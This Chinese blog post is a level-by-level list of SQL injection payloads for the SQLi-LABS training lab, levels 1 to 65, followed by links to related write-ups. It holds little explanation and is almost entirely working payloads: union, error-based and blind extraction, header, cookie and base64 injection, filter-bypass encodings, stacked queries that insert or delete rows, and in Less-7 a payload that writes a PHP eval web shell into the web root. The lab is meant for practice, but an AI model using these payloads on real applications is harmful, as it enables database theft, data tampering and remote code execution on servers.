SQL注入-SQLi-LABS靶场1-65完整payload

最新推荐文章于 2024-05-07 23:35:00 发布
最新推荐文章于 2024-05-07 23:35:00 发布
阅读量1.1k 收藏 9
点赞数 1
分类专栏: web渗透 SQL注入 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45055749/article/details/128416379
版权

Less-01

http:///Less-1/
?id=-1' union select 1,database(),3 %23

在这里插入图片描述

Less-02

http://ip/Less-2/
?id=-1  union select 1,database(),3 %23

在这里插入图片描述

?id=-1 union select 1,@@basedir,@@datadir
 
 basedir()指定了安装MYSQL的安装路径
 datadir()指定了安装MYSQL的数据文件路径

在这里插入图片描述

Less-03

http://ip/Less-3/
?id=-1')  union select 1,database(),3 %23

在这里插入图片描述

Less-04

http://ip/Less-4/
?id=-1")  union select 1,database(),3 %23

在这里插入图片描述

Less-05

http://ip/Less-5/
?id=1' union select 1,count(*),concat_ws('~',database(),floor(rand()*2)) as a from 
information_schema.tables group by a --+

在这里插入图片描述

Less-06

http://ip/Less-6/
?id=1" union select 1,count(*),concat_ws('~',database(),floor(rand()*2)) as a from information_schema.tables group by a --+

在这里插入图片描述

Less-07

http://ip/Less-7/
?id=1')) union select 1,2,'<?php @eval($_REQUEST["123"])?>' into outfile 
"\\var\\www\\html\\Less-7\\hacker.php" --+

Less-08

http://ip/Less-8/
?id=1' and substr(database(),1,1)='s' --+

在这里插入图片描述

http://ip/Less-8/
?id=1' and substr(database(),1,1)>'s' --+

在这里插入图片描述

Less-9

http://ip/Less-9/
?id=1' and if((length(database())=8),sleep(3),0) --+

在这里插入图片描述

Less-10

http://ip/Less-10/
?id=1" and if((length(database())=8),sleep(3),0) --+

在这里插入图片描述

Less-11

http://ip/Less-11/
?id=1
uname=ad' union select user(),database()#&passwd=admin&submit=Submit

在这里插入图片描述

Less-12

http://ip/Less-12/
?id=1
uname=ad") union select user(),database()#&passwd=admin&submit=Submit

在这里插入图片描述

Less-13

http://ip/Less-13/
uname=ad') and updatexml(1,concat(0x7e,(select user()),0x7e),1)#&passwd=admin&submit=Submit

在这里插入图片描述

Less-14

http://ip/Less-14/
uname=admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1)#&passwd=admin&submit=Submit

在这里插入图片描述

Less-15

http://ip/Less-15/
uname=' or ascii(substr(@@version,1,1))<64 -- &passwd=&submit=Submit

在这里插入图片描述

http://ip/Less-15/
uname=' or ascii(substr(@@version,1,1))>64 -- &passwd=&submit=Submit

在这里插入图片描述

Less-16

http://ip/Less-16/
uname=") or ascii(substr(@@version,1,1))<64 -- &passwd=&submit=Submit

在这里插入图片描述

http://ip/Less-16/
uname=") or ascii(substr(@@version,1,1))>64 -- &passwd=&submit=Submit

在这里插入图片描述

Less-17

http://ip/Less-17/
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT 
database()),0x7e),1)#&submit=Submit

在这里插入图片描述

Less-18

在这里插入图片描述

User-Agent: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or '1

在这里插入图片描述

Less-19

在这里插入图片描述

Referer: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or '

在这里插入图片描述

Less-20

在这里插入图片描述

Cookie:  uname=' union select user(),2,3#

在这里插入图片描述

Less-21

在这里插入图片描述
编码前

') union select user(),2,3#

编码后

JykgdW5pb24gc2VsZWN0IHVzZXIoKSwyLDMj

在这里插入图片描述

Less-22

在这里插入图片描述

#编码前
" union select 1,2,user()#
#编码后
IiB1bmlvbiBzZWxlY3QgMSwyLHVzZXIoKSM=

在这里插入图片描述

Less-23

http://ip/Less-23
?id=' union select 1,database(),'3

在这里插入图片描述

Less-24

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Less-25

http://ip/Less-25
?id=1'|| extractvalue(1,concat(0x7e,database())) -- +

在这里插入图片描述

Less-25a

http://ip/Less-25a
?id=-1 union select 1,database(),3 -- +

在这里插入图片描述

Less-26

在这里插入图片描述

http://ip/Less-26
?id=-1' || updatexml(1,concat(0x7e,database()),1) || '1'='1

在这里插入图片描述

Less-26a

#过滤负号
http://ip/Less-26a
?id=1000')%a0union%a0select%a01,user(),('3

在这里插入图片描述

Less-27

http://ip/Less-27
?id=-1000'unIon%a0SelEcT%a01,database(),3||'1

在这里插入图片描述

Less-27a

http://ip/Less-27a
?id=0" %a0 UniOn %a0 SelECT %a0 1,2,database();%00

在这里插入图片描述

Less-28

http://ip/Less-28
?id=0')union%a0select(1),(user()),(3)||('1

在这里插入图片描述

Less-28a

http://ip/Less-28a
?id=0') uNion%a0sElect 1,user(),('3

在这里插入图片描述

Less-29

http://ip/Less-29
?id=0&id=-1'  uNion%a0sElect 1,user(),'3

在这里插入图片描述

Less-30

http://ip/Less-30
?id=0&id=-1" uNion%a0sElect 1,user(),"3

在这里插入图片描述

Less-31

http://ip/Less-31
?id=0&id=-1") uNion%a0sElect 1,user(),("3

在这里插入图片描述

Less-32

http://ip/Less-32
?id=0&id=-1%df%27 union select 1,user(),3 -- +

在这里插入图片描述

Less-33

http://ip/Less-33
?id=0&id=-1%df%27 union select 1,user(),3 -- +

在这里插入图片描述

Less-34

http://ip/Less-34
uname=%bb' or 1 limit 1,1#&passwd=1

在这里插入图片描述

Less-35

http://ip/Less-35
?id=11 and (extractvalue(1,concat(1,(select database()))))  --+

在这里插入图片描述

Less-36

http://ip/Less-36
?id=-1%df' union select 1,2,database() --+

在这里插入图片描述

Less-37

http://ip/Less-36
uname=-1%df%27 union select 1,database()--+&passwd=1&submit=Submit

在这里插入图片描述

Less-38

http://ip/Less-38
?id=1';insert into users values(38,'less38','hello')--+

在这里插入图片描述
在这里插入图片描述

Less-39

http://ip/Less-39
?id=1;insert into users values(39,'less39','hello')--+

在这里插入图片描述
在这里插入图片描述

Less-40

http://ip/Less-40
?id=1');insert into users values(40,'Less40','hello')--+

在这里插入图片描述

Less-41

http://ip/Less-41
?id=1;insert into users values(41,'Less41','hello')--+

在这里插入图片描述

Less-42

在这里插入图片描述

';insert into users values(null,'adm','adm');#

在这里插入图片描述

Less-43

在这里插入图片描述

a');insert into users values(null,'adm1','adm1')#

在这里插入图片描述

Less-44

在这里插入图片描述


a';insert into users values(null,'adm2','adm2')#

在这里插入图片描述

Less-45

在这里插入图片描述

a');insert into users values(null,'adm3','adm3')#

在这里插入图片描述

Less-46

http://ip/Less-46
?sort=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--+

在这里插入图片描述

Less-47

http://ip/Less-47/
?sort=1' and extractvalue(1,concat(0x7e,database(),0x7e)) --+

在这里插入图片描述

Less-48

http://ip/Less-48/
?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(0.5),1) --+

在这里插入图片描述

Less-49

http://ip/Less-49/
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(0.5),1)--+

在这里插入图片描述

Less-50 (mysqli_multi_query())

http://ip/Less-50/
?sort=1 desc;insert into users values(null,'test','test');--+

在这里插入图片描述

Less-51

http://ip/Less-51/
?sort=1' ;delete from users where id=19;

在这里插入图片描述

Less-52

http://ip/Less-52/
?sort=1  desc;delete from users where id=18;

**在这里插入图片描述**

Less-53(无回显)

http://ip/Less-52/
?sort=1 desc'

在这里插入图片描述

http://ip/Less-52/
?sort=1 desc'; insert into users values(null,'test1','test1');

在这里插入图片描述

Less-53(无回显)

http://ip/Less-52/
?sort=1';

在这里插入图片描述

http://ip/Less-53/
?sort=1';delete from users where id=24;

在这里插入图片描述

Changllenge

Less-54

http://ip/Less-54/
?id=-1' union select 1,database(),3 --+

在这里插入图片描述

http://ip/Less-54/
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

在这里插入图片描述

http://ip/Less-54/
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="HIURO68RLB"),3 --+

在这里插入图片描述

http://ip/Less-54/
?id=-1' union select 1,(select group_concat(secret_B1JE) from HIURO68RLB),3 --+

在这里插入图片描述

Less-55

http://ip/Less-55/
?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

在这里插入图片描述

http://ip/Less-55/
?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_name="B7966YL9EE"),3 --+

在这里插入图片描述

http://ip/Less-55/
?id=-1) union select 1,(select group_concat(secret_IYLU) from B7966YL9EE),3 --+

在这里插入图片描述

Less-56

http://ip/Less-56/
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

在这里插入图片描述

http://ip/Less-56/
?id=-1')  union select 1,(select group_concat(column_name) from information_schema.columns where table_name="IAMTKU9YP5"),3 --+

在这里插入图片描述

http://ip/Less-56/
?id=-1') union select 1,(select group_concat(secret_EX3R) from IAMTKU9YP5),3 --+

在这里插入图片描述

Less-57

http://ip/Less-57/
?id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

在这里插入图片描述

http://ip/Less-57/
?id=-1"  union select 1,(select group_concat(column_name) from information_schema.columns where table_name="SHHUH6ZE8E"),3 --+

在这里插入图片描述

http://ip/Less-57/
?id=-1" union select 1,(select group_concat(secret_BNBI) from SHHUH6ZE8E),3 --+

在这里插入图片描述

Less-58

http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,database(),0x7e))--+

在这里插入图片描述

http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from 
information_schema.tables where table_schema=database()),0x7e))--+

在这里插入图片描述

http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_name="3T2NJQ3VYK"),0x7e))--+

在这里插入图片描述

http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(secret_3LQM) from 3T2NJQ3VYK),0x7e))--+

在这里插入图片描述

Less-59

http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from 
information_schema.tables where table_schema=database()),0x7e))--+

在这里插入图片描述

http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_name="G15HNN62G8"),0x7e))--+

在这里插入图片描述

http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(secret_B2OI) from G15HNN62G8),0x7e))--+

在这里插入图片描述

Less-60

http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from 
information_schema.tables where table_schema=database()),0x7e))--+

在这里插入图片描述

http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_name="CPOBEOTIAA"),0x7e))--+

在这里插入图片描述

http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(secret_FD8C) from CPOBEOTIAA),0x7e))--+

在这里插入图片描述

Less-60

http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from 
information_schema.tables where table_schema=database()),0x7e))--+

在这里插入图片描述

http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_name="XJD2PNZS5E"),0x7e))--+

在这里插入图片描述

http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_ZJU4) from XJD2PNZS5E),0x7e))--+

在这里插入图片描述

Less-62

http://ip/Less-62/
?id=1') and ascii(substr(database(),1,1))<115 --+

在这里插入图片描述

http://ip/Less-62/
?id=1') and ascii(substr(database(),1,1))>115 --+

在这里插入图片描述

Less-63

http://ip/Less-63/
?id=1' and ascii(substr(database(),1,1))<115 --+

在这里插入图片描述

http://ip/Less-63/
?id=1' and ascii(substr(database(),1,1))>115 --+

在这里插入图片描述

Less-64

http://ip/Less-64/
?id=1)) and ascii(substr(database(),1,1))<115--+

在这里插入图片描述

http://ip/Less-64/
?id=1)) and ascii(substr(database(),1,1))>115--+

在这里插入图片描述

Less-65

http://ip/Less-65/
?id=1") and ascii(substr(database(),1,1))<115–+
在这里插入图片描述

http://ip/Less-65/
?id=1") and ascii(substr(database(),1,1))>115--+

在这里插入图片描述

问心彡
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
Sqli-labs 1-65关的解题记录(做题思路与简要)
CaesarQu的博客
08-13 3616
Sqli-labs的详细解题记录 Less-1: 进入关卡内先判断是否存在注入情况,先输入?id =1 and 1=1,发现没有变化,换成and 1=2,依旧没有变化,考虑是为字符型而非整形。用 ’ 进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入。 发现为字符型的后先在后面加一个注释符 --+ 可以发现正常返回数据。 此处可以用 order by 对前面的数据进行排列,先进行试数,发现只有三组数据,'order by 4–+就会超出 然后就可以进行union联合注入 然后就可以获取所有
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sql注入---sqli靶场1-9
最新发布
weixin_72202802的博客
05-07 497
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7464
sqli-labs,sql注入,burpsuit
sqli-labs靶场分析
RestoreJustice的博客
03-18 2371
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
SQL注入Playload List
qq_52014772的博客
07-22 1144
SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。 SQL注入类型 类型 描述 In-band SQLi (Classic SQLi) In-band SQLi注入是SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生In-band SQLi注入。In-band SQLi注入的两种最常见类型是基于错误的SQLi和基于联合的SQLi。 Error-based SQLi 基于错误的SQLi是一种In-band..
mysql注入-sqlilabs靶场注入
10-15
SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些关卡,你可以理解不同类型的SQL注入漏洞,并学习如何检测和利用它们。 ...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
Sqli-Labs靶场(1--5)题详解
weixin_46099095的博客
03-10 4625
目录 一.Less-1:GET - Error based - Single quotes -String(GET - 基于错误 - 单引号 - 字符串) 一、判断注入点 二、确认列数 三、使用Union select 进行查询 四、爆破所有数据库名以及当前数据库名 五、爆破security数据库内的所有表名 六、爆破users表内的所有列名 七、查询所有的用户名,密码 二.Less-2:GET - Error based - Intiger based(GET - 基于错误 -..
Sqli-labs靶场搭建(适合新手小白围观)
weixin_72543266的博客
09-12 7010
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs闯关记录(1~65关)
qq_62540010的博客
01-04 3676
sql漏洞闯关记录笔记(1~15) 1.基本知识 首先我们先了解SQL注入是什么: SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一,其实就是恶意用户通过在可提交给数据库的地方写入恶意代码,将数据库的数据提取出来。. 2.工具 在1~15关,我们要用到hacbar,burpsuit,中国蚁剑,并且我用的是phpstudy2018来配置的Apache和mysql. 3.less 1,2,3,4 之所以把1234关一起破解,是因为它们属于同一类型,下面我们来看一看他们的不同
pikachu-SQL注入
qq_43660551的博客
05-11 1353
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
sql-labs靶场环境搭建(手把手教你如何搭建)
热门推荐
Joker_Dgh的博客
04-02 3万+
sqli-labs介绍 SQLI-LAB下载地址: https://github.com/Audi-1/sqli-labs WEB环境搭建: 在安装靶场之前,我们还需要搭建web运行环境: 这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 下载后安装即可。 Sql-labs靶场环境搭建 安装好phpst..
零基础学SQL注入必练靶场SQLiLabs(搭建+打靶)
Ms08067安全实验室
12-20 1万+
文章来源 | MS08067Web零基础就业班1期作业本文作者:giunwr、tyrant(零基础1期)SQLi-Labs是一个专业的SQL注入漏洞练习靶场,零基础的同学学SQL注入的时候,sqli-labs这个靶场是必练的,它里面包含了很多注入场景,以及在sql注入的时候遇到的各种问题,适用于GET和POST场景,包含了以下注入:一、作业描述完成sqllibs前18关,尽可能使用多的方法二、s...
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1595
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

问心彡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值